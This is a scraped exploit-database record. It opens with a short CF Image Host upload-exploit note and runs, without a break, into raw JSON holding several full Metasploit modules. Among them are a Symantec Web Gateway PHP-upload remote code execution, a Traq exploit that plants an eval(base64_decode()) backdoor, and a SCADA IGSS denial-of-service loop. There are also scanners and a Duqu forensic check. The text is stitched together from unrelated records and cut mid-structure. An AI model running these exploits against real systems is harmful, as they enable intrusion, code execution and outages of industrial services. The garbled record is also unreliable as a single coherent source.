ID 1337DAY-ID-12090
Type zdt
Reporter The.Morpheus
Modified 2010-05-01T00:00:00
Description
Exploit for php platform in category web applications
======================================================
CF Image Host v1.1 Remote File Inclusion Vulnerability
======================================================
###########################################################
Download: http://codefuture.co.uk/counter/?id=22
Title: CF Image Host Remote File Inclusion Vulnerability
Author: The.Morpheus
Contact: -
Thanks: everyone :)
Greetz: Megaturks.Net | Spyturks.Com
Demo: http://codefuture.co.uk/projects/imagehost1.1/demo/
========================================================================
Description:
Exploit: Upload Vulnerability
Step 1: Shell Jpg, Gif
Step 2: upload
Demo: http://server/upload.php
# 0day.today [2018-04-01] #
Due to the incorrect use of file extensions in the upload_file()\n function, attackers may to abuse the spywall/blocked_file.php file in order to\n upload a malicious PHP file without any authentication, which results in arbitrary\n code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Tenable Network Security, Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0299' ],\n [ 'OSVDB', '82025' ],\n [ 'BID', '53443' ],\n [ 'ZDI', '12-091' ],\n [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Symantec Web Gateway 5.0.2.8', {}],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 17 2012\",\n 'DefaultTarget' => 0))\n\n self.needs_cleanup = true\n end\n\n\n def check\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => '/spywall/login.php'\n })\n\n if res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def on_new_session(client)\n print_warning(\"Deleting temp.php\")\n if client.type == \"meterpreter\"\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n client.fs.file.rm(\"temp.php\")\n else\n client.shell_command_token(\"rm temp.php\")\n end\n end\n\n def exploit\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n peer = \"#{rhost}:#{rport}\"\n payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\n before_filename = rand_text_alpha(rand(10) + 5)\n after_filename = rand_text_alpha(rand(10) + 5)\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\")\n 
post_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\")\n post_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\")\n post_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\")\n\n print_status(\"Sending PHP payload (#{payload_name})\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"spywall/blocked_file.php\"),\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n # If the server returns 200 and the body contains the name\n # of the default file, we assume we uploaded the malicious\n # file successfully\n if not res or res.code != 200 or res.body !~ /temp.php/\n print_error(\"File wasn't uploaded, aborting!\")\n return\n end\n\n print_status(\"Executing PHP payload (#{payload_name})\")\n # Execute our payload\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"#{uri}spywall/images/upload/temp/temp.php\"\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either. 
Print the status code for debugging purposes.\n if res and res.code != 200\n print_status(\"Server returned #{res.code.to_s}\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/symantec_web_gateway_file_upload.rb"}, {"lastseen": "2019-12-05T03:10:10", "bulletinFamily": "exploit", "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.\n", "modified": "2017-07-24T13:26:21", "published": "2012-05-22T08:03:30", "id": "MSF:POST/OSX/ADMIN/SAY", "href": "", "type": "metasploit", "title": "OS X Text to Speech Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => \"OS X Text to Speech Utility\",\n 'Description' => %q{\n This module will speak whatever is in the 'TEXT' option on the victim machine.\n },\n 'References' =>\n [\n ['URL', 'http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/']\n ],\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sinn3r'],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ \"meterpreter\", \"shell\" ]\n ))\n\n register_options(\n [\n OptString.new('TEXT', [true, 'The text to say', \"meta-sploit\\!\"]),\n OptString.new('VOICE', [true, 'The voice to use', 'alex'])\n ])\n end\n\n\n def exec(cmd)\n tries = 0\n begin\n out = cmd_exec(cmd).chomp\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n end\n end\n\n\n def run\n txt = datastore['TEXT']\n voice = datastore['VOICE']\n\n # Say the text\n out = cmd_exec(\"say -v 
\\\"#{voice}\\\" \\\"#{txt}\\\"\")\n if out =~ /command not found/\n print_error(\"The remote machine does not have the \\'say\\' command\")\n elsif not out.empty?\n print_status(out)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/admin/say.rb"}, {"lastseen": "2019-11-18T13:31:49", "bulletinFamily": "exploit", "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be brought down by sending a crafted TCP packet to port 12401. This should also work for version <= 9.0.0.1120, but that version hasn't been tested.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-20T18:57:13", "id": "MSF:AUXILIARY/DOS/SCADA/IGSS9_DATASERVER", "href": "", "type": "metasploit", "title": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => '7-Technologies IGSS 9 IGSSdataServer.exe DoS',\n 'Description' => %q{\n The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.\n },\n 'Author' =>\n [\n 'jfa', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-4050' ],\n [ 'OSVDB', '77976' ],\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf' ]\n ],\n 'DisclosureDate' => 'Dec 20 2011'\n ))\n\n register_options(\n [\n Opt::RPORT(12401),\n OptInt.new('COUNT', [ true, \"DoS IGSSdataServer.exe this many times. 
0 for infinite loop.\", 1]),\n OptInt.new('SLEEP', [ true, 'Number of seconds to sleep between sending DoS packet.', 3])\n ])\n end\n\n def run\n #\n #dos = \"\\x00\\x04\\x01\\x00\\x34\\x12\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n #dos << Rex::Text.rand_text_alpha(5014)\n #\n # I should have looked at the other MSF modules before I started doing it the hard way.\n # Lesson learn, thanks hal. Mostly borrowed from igss9_igssdataserver_rename\n #\n\n count = datastore['COUNT']\n snore = datastore['SLEEP']\n times = 1\n\n # Someone wants to keep a good service down.\n if count == 0\n count = 1\n infinite = true\n end\n\n #\n # The port seems to stay open open until someone clicks \"Close the program\".\n # Once they click \"Close the program\" (Windows 7), the port becomes unavailable.\n #\n # However, even though it's open, it doesn't seem to handle any valid requests.\n #\n while count >= 1 do\n ## Randomize the buffer size to make it a teeny tiny bit less obvious\n size = Random.new.rand(1024..5014)\n\n dos = \"\\x00\\x04\" #Funky size causes overflow\n dos << \"\\x01\\x00\\x34\\x12\"\n dos << \"\\x0D\" #Opcode\n dos << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dos << \"\\x01\" #Flag\n dos << \"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n dos << Rex::Text.rand_text_alpha(size)\n\n begin\n connect\n sock.put(dos)\n print_status(\"Sending DoS packet #{times}, size: #{dos.length} ...\")\n disconnect\n rescue ::Rex::ConnectionError, Errno::ECONNREFUSED\n print_status(\"Connection refused. 
Someone may have clicked 'Close the program'\")\n end\n\n if infinite\n select(nil, nil, nil, snore)\n times += 1\n else\n select(nil, nil, nil, snore) if count > 1\n count -= 1\n times += 1\n end\n\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/scada/igss9_dataserver.rb"}, {"lastseen": "2019-11-18T14:59:43", "bulletinFamily": "exploit", "description": "This module sends a query to the port 264/TCP on CheckPoint Firewall-1 firewalls to obtain the firewall name and management station (such as SmartCenter) name via a pre-authentication request. The string returned is the CheckPoint Internal CA CN for SmartCenter and the firewall host. Whilst considered \"public\" information, the majority of installations use detailed hostnames which may aid an attacker in focusing on compromising the SmartCenter host, or useful for government, intelligence and military networks where the hostname reveals the physical location and rack number of the device, which may be unintentionally published to the world.\n", "modified": "2017-11-08T16:00:24", "published": "2011-12-14T12:10:30", "id": "MSF:AUXILIARY/GATHER/CHECKPOINT_HOSTNAME", "href": "", "type": "metasploit", "title": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',\n 'Description' => %q{\n This module sends a query to the port 264/TCP on CheckPoint Firewall-1\n firewalls to obtain the firewall name and management station\n (such as SmartCenter) name via a 
pre-authentication request. The string\n returned is the CheckPoint Internal CA CN for SmartCenter and the firewall\n host. Whilst considered \"public\" information, the majority of installations\n use detailed hostnames which may aid an attacker in focusing on compromising\n the SmartCenter host, or useful for government, intelligence and military\n networks where the hostname reveals the physical location and rack number\n of the device, which may be unintentionally published to the world.\n },\n 'Author' => [ 'aushack' ],\n 'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference\n 'References' =>\n [\n # aushack - None? Stumbled across, probably an old bug/feature but unsure.\n [ 'URL', 'http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],\n [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(264),\n ])\n end\n\n def autofilter\n false\n end\n\n def run\n print_status(\"Attempting to contact Checkpoint FW1 SecuRemote Topology service...\")\n fw_hostname = nil\n sc_hostname = nil\n\n connect\n\n sock.put(\"\\x51\\x00\\x00\\x00\")\n sock.put(\"\\x00\\x00\\x00\\x21\")\n res = sock.get_once(4)\n if (res and res == \"Y\\x00\\x00\\x00\")\n print_good(\"Appears to be a CheckPoint Firewall...\")\n sock.put(\"\\x00\\x00\\x00\\x0bsecuremote\\x00\")\n res = sock.get_once\n if (res and res =~ /CN=(.+),O=(.+)\\./i)\n fw_hostname = $1\n sc_hostname = $2\n print_good(\"Firewall Host: #{fw_hostname}\")\n print_good(\"SmartCenter Host: #{sc_hostname}\")\n end\n else\n print_error(\"Unexpected response: '#{res.inspect}'\")\n end\n\n report_info(fw_hostname,sc_hostname)\n\n disconnect\n end\n\n # Only trust that it's real if we have a hostname. 
If you get a funny\n # response, it might not be what we think it is.\n def report_info(fw_hostname,sc_hostname)\n return unless fw_hostname\n host_info = {\n :host => datastore['RHOST'],\n :os_name => \"Checkpoint Firewall-1\",\n :purpose => \"firewall\"\n }\n host_info[:name] = fw_hostname\n host_info[:info] = \"SmartCenter Host: #{sc_hostname}\" if sc_hostname\n report_host(host_info)\n svc_info = {\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :proto => \"tcp\",\n :name => \"securemote\"\n }\n report_service(svc_info)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/checkpoint_hostname.rb"}, {"lastseen": "2019-11-19T23:07:55", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. This function is called in each script located in the /admicp/ directory to make sure the user has admin rights. This is a broken authorization schema because the header() function doesn't stop the execution flow. This can be exploited by malicious users to execute admin functionality, e.g. 
execution of arbitrary PHP code leveraging of plugins.php functionality.\n", "modified": "2017-07-24T13:26:21", "published": "2011-12-12T21:45:19", "id": "MSF:EXPLOIT/MULTI/HTTP/TRAQ_PLUGIN_EXEC", "href": "", "type": "metasploit", "title": "Traq admincp/common.php Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Traq admincp/common.php Remote Code Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in\n Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n This function is called in each script located in the /admicp/ directory to\n make sure the user has admin rights. This is a broken authorization schema\n because the header() function doesn't stop the execution flow.\n This can be exploited by malicious users to execute admin functionality,\n e.g. 
execution of arbitrary PHP code leveraging of plugins.php functionality.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'EgiX', # Vulnerability discovery and exploit\n 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'OSVDB', '77556'],\n [ 'EDB', '18213' ],\n [ 'URL', 'http://traqproject.org/' ],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Keys' => ['php'],\n 'Space' => 4000,\n 'DisableNops' => true,\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => 'Dec 12 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The path to the Traq installation\", \"/\"]),\n ])\n end\n\n def check\n uri = normalize_uri(datastore['URI'], \"admincp\", \"login.php\")\n\n res = send_request_raw(\n {\n 'uri'=> uri\n }, 25)\n\n if (res and res.body =~ /Powered by Traq 2.[0-3]/ )\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n p = Rex::Text.encode_base64(payload.encoded)\n\n uri = normalize_uri(datastore['URI'], \"admincp\", \"plugins.php\") + \"?newhook\"\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' =>\n {\n 'plugin_id' => '1',\n 'title' => '1',\n 'execorder' => '0',\n 'hook' => 'template_footer',\n 'code' => 'error_reporting(0);eval(base64_decode($_SERVER[HTTP_CMD]));die;'\n }\n }, 25)\n\n uri = normalize_uri(datastore['URI'], \"index.php\")\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => uri,\n 'headers' =>\n {\n 'CMD' => p,\n 'Connection' => 'Close',\n },\n }, 25)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/traq_plugin_exec.rb"}, {"lastseen": "2019-12-11T17:35:21", "bulletinFamily": "exploit", "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.\n", "modified": 
"2017-07-24T13:26:21", "published": "2011-11-10T21:20:48", "id": "MSF:POST/WINDOWS/GATHER/FORENSICS/DUQU_CHECK", "href": "", "type": "metasploit", "title": "Windows Gather Forensics Duqu Registry Check", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather Forensics Duqu Registry Check',\n 'Description' => %q{ This module searches for CVE-2011-3402 (Duqu) related registry artifacts.},\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Marcus J. Carey <mjc[at]threatagent.com>'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'References' =>\n [\n [ 'CVE', '2011-3402' ],\n [ 'URL', 'http://r-7.co/w5h7fY' ]\n ]\n ))\n end\n\n def run\n # Registry artifacts sourced from Symantec report\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\\"CFID\"',\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\CFID',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3\\FILTER'\n ]\n match = 0\n\n print_status(\"Searching registry on #{sysinfo['Computer']} for CVE-2011-3402 exploitation [Duqu] artifacts.\")\n\n begin\n artifacts.each do |artifact|\n (path, query) = parse_path(artifact)\n has_key = registry_enumkeys(path)\n has_val = registry_enumvals(path)\n\n if has_key.include?(query) or has_val.include?(query)\n print_good(\"#{sysinfo['Computer']}: #{path}\\\\#{query} found in registry.\")\n match += 1\n report_vuln(\n :host => session.session_host,\n :name => self.name,\n :info => \"Module #{self.fullname} detected #{path}\\\\#{query} - 
possible CVE-2011-3402 exploitation [Duqu] artifact.\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\n end\n rescue # Probably should do something here...\n end\n\n print_status(\"#{sysinfo['Computer']}: #{match.to_s} artifact(s) found in registry.\")\n\n end\n\n def parse_path(artifact)\n parts = artifact.split(\"\\\\\")\n query = parts[-1]\n parts.pop\n path = parts.join(\"\\\\\")\n return path, query\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/duqu_check.rb"}, {"lastseen": "2019-11-27T09:56:04", "bulletinFamily": "exploit", "description": "Scan for exposed VxWorks wdbrpc daemons\n", "modified": "2017-07-24T13:26:21", "published": "2010-08-02T05:56:26", "id": "MSF:AUXILIARY/SCANNER/VXWORKS/WDBRPC_VERSION", "href": "", "type": "metasploit", "title": "VxWorks WDB Agent Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::WDBRPC\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VxWorks WDB Agent Version Scanner',\n 'Description' => 'Scan for exposed VxWorks wdbrpc daemons',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],\n ['US-CERT-VU', '362332']\n ]\n )\n\n register_options(\n [\n OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),\n Opt::RPORT(17185)\n ])\n end\n\n\n # Define our batch size\n def run_batch_size\n datastore['BATCHSIZE'].to_i\n end\n\n # Operate on an entire batch of hosts at once\n def run_batch(batch)\n\n begin\n udp_sock = nil\n idx = 0\n\n udp_sock = Rex::Socket::Udp.create(\n {\n 'Context' => 
{'Msf' => framework, 'MsfExploit' => self}\n }\n )\n add_socket(udp_sock)\n\n batch.each do |ip|\n\n begin\n udp_sock.sendto(create_probe(ip), ip, datastore['RPORT'].to_i, 0)\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n end\n\n if (idx % 10 == 0)\n while (r = udp_sock.recvfrom(65535, 0.01) and r[1])\n parse_reply(r)\n end\n end\n\n idx += 1\n end\n\n cnt = 0\n del = 10\n sts = Time.now.to_i\n while (r = udp_sock.recvfrom(65535, del) and r[1])\n parse_reply(r)\n\n # Prevent an indefinite loop if the targets keep replying\n cnt += 1\n break if cnt > run_batch_size\n\n # Escape after 15 seconds regardless of batch size\n break if ((sts + 15) < Time.now.to_i)\n\n del = 1.0\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_status(\"Unknown error: #{e.class} #{e}\")\n ensure\n udp_sock.close if udp_sock\n end\n end\n\n #\n # The response parsers\n #\n def parse_reply(pkt)\n\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n\n data = pkt[0]\n\n # Bare RPC response\n if data.length == 24\n ecode = data[20,4].unpack(\"N\")[0]\n emesg = \"unknown\"\n case ecode\n when 3\n # Should not be hit\n emesg = \"Device requires the VxWorks 5 WDB protocol\"\n when 5\n emesg = \"Device failed to parse the probe\"\n end\n\n print_status(\"#{pkt[1]} Error: code=#{ecode} #{emesg}\")\n return\n end\n\n if data.length < 80\n print_status(\"#{pkt[1]}: Unknown response #{data.unpack(\"H*\")[0]}\")\n return\n end\n\n res = wdbrpc_parse_connect_reply(data)\n print_good(\"#{pkt[1]}: #{res[:rt_vers]} #{res[:rt_bsp_name]} #{res[:rt_bootline]}\")\n\n report_note(\n :host => pkt[1],\n :port => datastore['RPORT'],\n :proto => 'udp',\n :type => 'vxworks.target_info',\n :data => res,\n :update => :unique\n )\n end\n\n def create_probe(ip)\n wdbrpc_request_connect(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vxworks/wdbrpc_version.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SECURITYVULNS:VULN:5976", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5976", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "Hi Guys,\r\n\r\n Doing a pen test I have come up with a WebEOC server. There are a few\r\nvulns listed at:\r\n\r\nhttp://secunia.com/advisories/16075/\r\n\r\nspecifically I am interested in :\r\n\r\n"6) Sensitive information is exposed in URIs, stored in publicly\r\naccessible configuration files, and in the HTML code returned to\r\nusers.\r\n\r\n7) A design error allows malicious users to access parts of the\r\napplication that they should not have access to by directly specifying\r\nthe URL."\r\n\r\nhowever I have been unable to find out what these files are called.\r\nAny information from people would be great. ESi have a demo on their\r\nsite, but it involves pretending to be interested in buying it and\r\ntalking to their sales guys.. 
so I figured I would ask here first.\r\n\r\nCheers.\r\nhf\r\n\r\n--\r\nparents will have to make sacrifices\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SECURITYVULNS:DOC:12090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12090", "title": "[Full-disclosure] WebEOC Vuln - more info", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}